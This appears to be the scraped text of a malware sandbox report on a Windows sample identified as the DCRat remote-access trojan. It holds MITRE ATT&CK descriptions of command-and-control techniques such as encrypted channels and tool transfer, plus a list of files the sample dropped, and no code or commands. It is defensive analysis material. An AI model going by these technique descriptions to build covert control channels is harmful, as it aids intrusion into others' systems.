Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FuWRu2Mg82.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\26853581233ef1

C:\Recovery\axnJvpyQnMRKSw.exe

C:\Recovery\axnJvpyQnMRKSw.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FuWRu2Mg82.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\axnJvpyQnMRKSw.exe.log

C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat

C:\Users\user\AppData\Local\Temp\2LXfWnm1ym

C:\Users\user\AppData\Local\Temp\2r9vxghkm3

C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat

C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat

C:\Users\user\AppData\Local\Temp\EF2LbGexCH

C:\Users\user\AppData\Local\Temp\KYHRvbShtG

C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat

Windows Analysis Report
FuWRu2Mg82.exe